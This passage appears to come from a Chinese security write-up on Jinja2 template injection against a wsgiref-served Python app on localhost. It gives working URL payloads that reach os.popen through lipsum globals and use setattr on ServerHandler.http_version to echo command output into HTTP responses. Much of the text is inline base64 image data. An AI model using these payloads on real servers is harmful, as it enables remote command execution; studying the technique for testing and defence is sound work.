Pn+LSmhobvTGdQr37U9x2Dc9XhjGzpmo/8FpqRJ3Z0/mIJR9/7jL5NhhOh9aFamzdZOKopirH+dd5fzqTIUXzUcRrhDpVo99oKZgwonq9S7Ft0oPOAfqys+h0/+GeVFI5+tHY4u7ng6u5EvrZISiQSiUQisYgn+mLh/xuEjqjQaKw9vbgwvhKvsJjL4xsUXO/ZH6jfeiI3HhH0ZWnYLDqbfHmfRCKRSCQSSTpyR5NZdETff0CiARLvHGLHwTCqDSpVOKorDmX18T48uvpsj5cM5iQSiUQikViIDOjMco5JrZvy420FjUNx6r4whdm9LXvpiVls3CkR4G4+nUQikUgkEokJ5JKrRCKRSCQSyTNOkX1dnEQikUgkEonEMmRAJ5FIJBKJRPKMIwM6iUQikUgkkmccGdBJJBKJRCKRPOPIgE4ikUgkEonkGUcGdBKJRCKRSCTPODKgk0gkEolEInnGKaSAzsCpZUd4/rtg7hWOwv8YqZyePZDeH/xTRP1X1O0rGuiC9zL7g5f4+cDDczd/H8nr36/mStzTs0sikUgk//8UWkAXcTeeM9eTyP2+pePQ/EPUaLkBpd56lOan2Vs4BZskaN5MZr44iZkvTmJGn7+5qssrZQrBf61i8aAp6WkHbiGoEMrf93FJ7OzssLOzw9Z2EGtT8kqZSsTN85y7eI/4Qij3EQ5+SslKX3LisRU8YfsKkRPjq1Py433/erkJZ2fSq8Vw9vm8RJeqD8/7tuhNvftT6NDmfbaHyXd4SyQSieTJ8O/8UkT0bXq2uU7VmfV5q4wGRdHi4WWN7RMuNi0+jqRkARFnWfd5OPV+70kF61wSxp1lzZATeHzWg1r+WhTFCjsPuwL/Llpy9D0iEgTcW8qLzS/xccxv9LApoNLH4eCnlByiZc3l8dR9CsX/m5wYX53n42cR9EPzf6/Q5ON80bgXN8ccYvGLxXP5lhTL/tGteOneZ5xa8gLF/j3LJBKJRPIfocAzdMenb0ufdau3HmXgNW7nlighlSgcqV/XCX9ve4rnJ5iLu8PRHxYx/+XJzHx5NssnHSc0KYs85QEX5ixn0aCpzB62iA0rb5FgDFG1jk44eTrj5GaLyd+6T9Kh
|
|||
|
|
<p>可以看到 self 是</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=o><</span><span class=n>wsgiref</span><span class=o>.</span><span class=na>simple_server</span><span class=o>.</span><span class=na>ServerHandler</span> <span class=n>object</span> <span class=n>at</span> <span class=mh>0x00000227DAC28850</span><span class=o>></span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>那么按照 flask 一样的思路,去寻找这个对象</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=nl>http:</span><span class=c1>//127.0.0.1:6543/?expression={{lipsum.__spec__.__init__.__globals__.sys.modules}}</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p><a id=img9 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160332-eaa18fb2-b53a-1.png><img src=data:image/png;base64,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
|
|||
|
|
<p>找到我们的 wsgiref moudle</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=nl>http:</span><span class=c1>//127.0.0.1:6543/?expression={{lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.__dict__}}</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>获取到 simple_server 对象,我们需要寻找 handler</p>
|
|||
|
|
<p><a id=img10 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160327-e7a5e268-b53a-1.png><img src=data:image/png;base64,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
|
|||
|
|
<div class=highlight><pre><span></span><span class=nl>http:</span><span class=c1>//127.0.0.1:6543/?expression={{lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.ServerHandler}}</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p>然后就是一样的 setter 方法<br>
|
|||
|
|
尝试修改它的属性</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=nl>http:</span><span class=c1>//127.0.0.1:6543/?expression={{lipsum.__globals__.__builtins__.setattr(lipsum.__spec__.__init__.__globals__.sys.modules.wsgiref.simple_server.ServerHandler,"http_version",lipsum.__globals__.__builtins__.__import__('os').popen('echo%20success').read())}}</span>
|
|||
|
|
</pre></div>
|
|||
|
|
<p><a id=img11 href=https://xzfile.aliyuncs.com/media/upload/picture/20241208160319-e34bfb58-b53a-1.png><img src="data:image/png;base64,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
|
|||
|
|
<p>成功,一样的我们可以寻找还有没有其他可以入手的点</p>
|
|||
|
|
<p>还是刚刚的位置</p>
|
|||
|
|
<div class=highlight><pre><span></span><span class=n>def</span> <span class=nf>send_preamble</span><span class=o>(</span><span class=n>self</span><span class=o>):</span>
|
|||
|
|
<span class=s>"""Transmit version/status/date/server, via self._write()"""</span>
|
|||
|
|
<span class=k>if</span> <span class=n>self</span><span class=o>.</span><span class=na>origin_server</span><span class=o>:</span>
|
|||
|
|
<span class=k>if</span> <span class=n>self</span><span class=o>.</span><span class=na>client_is_modern</span><span class=o>():</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>_write</span><span class=o>((</span><span class=err>'</span><span class=n>HTTP</span><span class=o>/%</span><span class=n>s</span> <span class=o>%</span><span class=n>s</span><span class=err>\</span><span class=n>r</span><span class=err>\</span><span class=n>n</span><span class=err>'</span> <span class=o>%</span> <span class=o>(</span><span class=n>self</span><span class=o>.</span><span class=na>http_version</span><span class=o>,</span><span class=n>self</span><span class=o>.</span><span class=na>status</span><span class=o>)).</span><span class=na>encode</span><span class=o>(</span><span class=err>'</span><span class=n>iso</span><span class=o>-</span><span class=mi>8859</span><span class=o>-</span><span class=mi>1</span><span class=err>'</span><span class=o>))</span>
|
|||
|
|
<span class=k>if</span> <span class=err>'</span><span class=n>Date</span><span class=err>'</span> <span class=n>not</span> <span class=n>in</span> <span class=n>self</span><span class=o>.</span><span class=na>headers</span><span class=o>:</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>_write</span><span class=o>(</span>
|
|||
|
|
<span class=o>(</span><span class=err>'</span><span class=n>Date</span><span class=o>:</span> <span class=o>%</span><span class=n>s</span><span class=err>\</span><span class=n>r</span><span class=err>\</span><span class=n>n</span><span class=err>'</span> <span class=o>%</span> <span class=n>format_date_time</span><span class=o>(</span><span class=n>time</span><span class=o>.</span><span class=na>time</span><span class=o>())).</span><span class=na>encode</span><span class=o>(</span><span class=err>'</span><span class=n>iso</span><span class=o>-</span><span class=mi>8859</span><span class=o>-</span><span class=mi>1</span><span class=err>'</span><span class=o>)</span>
|
|||
|
|
<span class=o>)</span>
|
|||
|
|
<span class=k>if</span> <span class=n>self</span><span class=o>.</span><span class=na>server_software</span> <span class=n>and</span> <span class=err>'</span><span class=n>Server</span><span class=err>'</span> <span class=n>not</span> <span class=n>in</span> <span class=n>self</span><span class=o>.</span><span class=na>headers</span><span class=o>:</span>
|
|||
|
|
<span class=n>self</span><span class=o>.</span><span class=na>_write</span><span class=o>((</span><span class=err>'</span><span class=n>Server</span><span class=o>:</span> <span class=o>%</span><span class=n>s</span><span class=err>\</span><span class=n>r</span><span class=err>\</span><span class=n>n</span><span class=err>'</span> <span class=o>%</span> <span class=n>self</span><span class=o>.</span><span class=na>server_software</span><span class=o>).</span><span class=na>encode</span><span class=o>(</span><span class=err>'</span><span class=n>iso</span><span class=o>-</span><span class=mi>8859</span><span class=o>-</span><span class=mi>1</span><span class=err>'</span><span class=o>))</span>
|
|||
|
|
<span class=k>else</span><span class=o>:</span>
|
|||
|
|
